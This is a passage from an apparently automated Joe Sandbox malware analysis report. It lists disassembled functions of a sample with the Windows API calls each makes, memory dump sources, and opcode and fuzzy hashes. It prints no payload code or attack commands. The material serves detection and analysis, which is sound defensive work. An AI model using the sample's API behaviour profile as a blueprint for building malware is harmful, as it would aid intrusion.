                                    • Instruction Fuzzy Hash: 4B213A395102898FD720EB35C444BDDF3A6DF80362FA4446BC8190BA93E336194ED7A6
                                    Function 000BEB70 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 000BEBB4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BEBE3
                                    • lstrcat.KERNEL32(?,00000000), ref: 000BEBF1
                                    • lstrcat.KERNEL32(?,00E6DF60), ref: 000BEC0C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FolderPathlstrcpy
                                    • String ID:
                                    • API String ID: 818526691-0
                                    • Opcode ID: e3be8087108a5c04a6ba564fbebbc4e925074152fe5a7f7e31f3effa7502970f
                                    • Instruction ID: c3fa3e135e0bab9cb8e1c7d5b9a62637a3e0214389c712d7a4843ff1e6c6c172
                                    • Opcode Fuzzy Hash: e3be8087108a5c04a6ba564fbebbc4e925074152fe5a7f7e31f3effa7502970f
                                    • Instruction Fuzzy Hash: 19318671E11118EBCB65EBA8EC45BEE73B4AF59300F1004B9BA1697251DE309E848B91
                                    Function 000C2B60 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,000CA3D0,000000FF), ref: 000C2B8F
                                    • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 000C2B96
                                    • GetLocalTime.KERNEL32(?,?,00000000,000CA3D0,000000FF), ref: 000C2BA2
                                    • wsprintfA.USER32 ref: 000C2BCE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 377395780-0
                                    • Opcode ID: df79ec24d105657d7c66f5c83fa6d29360afc5650913211e7f08f784f7fc27ca
                                    • Instruction ID: ef0f9ef30e24ae617a5246ab866cab413fec56c844e595b21966c7a0f152f421
                                    • Opcode Fuzzy Hash: df79ec24d105657d7c66f5c83fa6d29360afc5650913211e7f08f784f7fc27ca
                                    • Instruction Fuzzy Hash: 560140B2D05128ABCB149BC9ED49FBEB7BCFB4CB12F00011AF645A2280E7785940C7B1
                                    Function 000C4480 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000), ref: 000C4492
                                    • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 000C44AD
                                    • CloseHandle.KERNEL32(00000000), ref: 000C44B4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000C44E7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                    • String ID:
                                    • API String ID: 4028989146-0
                                    • Opcode ID: ecdf5057600b09abb4e3c8e90798ec0cb66a7e9712c5324d8f5737bfb629f3ba
                                    • Instruction ID: b4d592d91794acfdd18a4a574b28a84ae8ff539a1b12a1df6abf8c0cf99f6dba
                                    • Opcode Fuzzy Hash: ecdf5057600b09abb4e3c8e90798ec0cb66a7e9712c5324d8f5737bfb629f3ba
                                    • Instruction Fuzzy Hash: B7F0C8B0D026252FE7209B74AC4DBEABBA8BB14705F1405A5FA85D6180DAB08CC48790
                                    Function 000C8FD1 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __getptd.LIBCMT ref: 000C8FDD
                                      • Part of subcall function 000C87FF: __amsg_exit.LIBCMT ref: 000C880F
                                    • __getptd.LIBCMT ref: 000C8FF4
                                    • __amsg_exit.LIBCMT ref: 000C9002
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 000C9026
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 300741435-0
                                    • Opcode ID: c82ef751fbee71c07f79bb7af4ac79aeaf5fab2a64fdf3276b3a1066b4b17aff
                                    • Instruction ID: 5bb208e1cae934015b8fb4f42d552ec49b387e1cb3196e467fe1f9f7ed7206b5
                                    • Opcode Fuzzy Hash: c82ef751fbee71c07f79bb7af4ac79aeaf5fab2a64fdf3276b3a1066b4b17aff
                                    • Instruction Fuzzy Hash: A4F096329497109BD761BB78580AF9D33E06F00711F34821DF6496A1D3DF645901DB69
                                    Function 000C7310 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(------,000A5BEB), ref: 000C731B
                                    • lstrcpy.KERNEL32(00000000), ref: 000C733F
                                    • lstrcat.KERNEL32(?,------), ref: 000C7349
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcatlstrcpylstrlen
                                    • String ID: ------
                                    • API String ID: 3050337572-882505780
                                    • Opcode ID: 3d7c9ad844c2af4347daf191e6ee3cdb03d880f7a66120f2d2fdd11d00819c2a
                                    • Instruction ID: e31a1297cb9463145a9feba48acedc37a332c365d9f3410773a00264d44d9de9
                                    • Opcode Fuzzy Hash: 3d7c9ad844c2af4347daf191e6ee3cdb03d880f7a66120f2d2fdd11d00819c2a
                                    • Instruction Fuzzy Hash: 13F0AC749157429FDB659F75EC48A26BBF9AF45701318882DA89AC7614E730D8408B10
                                    Function 000B33D0 Relevance: 5.5, APIs: 4, Instructions: 486stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A1557
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A1579
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A159B
                                      • Part of subcall function 000A1530: lstrcpy.KERNEL32(00000000,?), ref: 000A15FF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B3422
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B344B
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B3471
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B3497
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID:
                                    • API String ID: 3722407311-0
                                    • Opcode ID: e95108b6797ef2bf955b71dcf3f79de798c68482d8ebcfb1169a7b6969c9cf45
                                    • Instruction ID: cf73b3dd5759f1e7dff99113794a91d0aebe10fa0138361311ad70b23f72a817
                                    • Opcode Fuzzy Hash: e95108b6797ef2bf955b71dcf3f79de798c68482d8ebcfb1169a7b6969c9cf45
                                    • Instruction Fuzzy Hash: DF120E70A012119FDB68CF19D558B65B7E4BF44718B29C0AEE809DB3A2D772ED82CF40
                                    Function 000B7C20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 000B7C94
                                    • std::_Xinvalid_argument.LIBCPMT ref: 000B7CAF
                                      • Part of subcall function 000B7D40: std::_Xinvalid_argument.LIBCPMT ref: 000B7D58
                                      • Part of subcall function 000B7D40: std::_Xinvalid_argument.LIBCPMT ref: 000B7D76
                                      • Part of subcall function 000B7D40: std::_Xinvalid_argument.LIBCPMT ref: 000B7D91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Xinvalid_argumentstd::_
                                    • String ID: string too long
                                    • API String ID: 909987262-2556327735
                                    • Opcode ID: faebf0f7e4526146a4f45ded21c3bcc112625c46cca6aaf43f3d00b50da4bd42
                                    • Instruction ID: ffbb2587210ea4b639970630d05b835fe3526be46aec6a235d69b55c4bdd6f2f
                                    • Opcode Fuzzy Hash: faebf0f7e4526146a4f45ded21c3bcc112625c46cca6aaf43f3d00b50da4bd42
                                    • Instruction Fuzzy Hash: A231C8723086148BD7349E6CE8849EAFBF9EFD1760B20462EF549CB741D7719C4183A5
                                    Function 000A6EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 000A6F74
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000A6F7B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcess
                                    • String ID: @
                                    • API String ID: 1357844191-2766056989
                                    • Opcode ID: 34c7d479645e88dbf6ffd2d473b5c821068f613e8d53b3b601b321c358741919
                                    • Instruction ID: 5559bf980cf9503bf156e7cf6819a61dec6964fc46a5df552371a3771a6b333d
                                    • Opcode Fuzzy Hash: 34c7d479645e88dbf6ffd2d473b5c821068f613e8d53b3b601b321c358741919
                                    • Instruction Fuzzy Hash: 5C218EB1A006029FEB608BA0DC84BB673F8EB42705F484878F956CB684F776E985C750
                                    Function 000C2400 Relevance: 5.2, APIs: 4, Instructions: 234stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000C244C
                                    • lstrlen.KERNEL32(00000000), ref: 000C24E9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000C2570
                                    • lstrlen.KERNEL32(00000000), ref: 000C2577
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: f913e7f1eb4ac41fb81c5b71bc304c00b257df383054eaeb423b40d550cc278a
                                    • Instruction ID: 68b97b6bb0d1d390c0196bbd828ccfe32b728070aa48cf96be9542d39d1848fd
                                    • Opcode Fuzzy Hash: f913e7f1eb4ac41fb81c5b71bc304c00b257df383054eaeb423b40d550cc278a
                                    • Instruction Fuzzy Hash: 7681A0B1E013099BDB14DF98DC54FAEB7B5AF94300F18807DE908A7282EB759D46CB94
                                    Function 000A1530 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000A1610: lstrcpy.KERNEL32(00000000), ref: 000A162D
                                      • Part of subcall function 000A1610: lstrcpy.KERNEL32(00000000,?), ref: 000A164F
                                      • Part of subcall function 000A1610: lstrcpy.KERNEL32(00000000,?), ref: 000A1671
                                      • Part of subcall function 000A1610: lstrcpy.KERNEL32(00000000,?), ref: 000A1693
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A1557
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A1579
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A159B
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A15FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
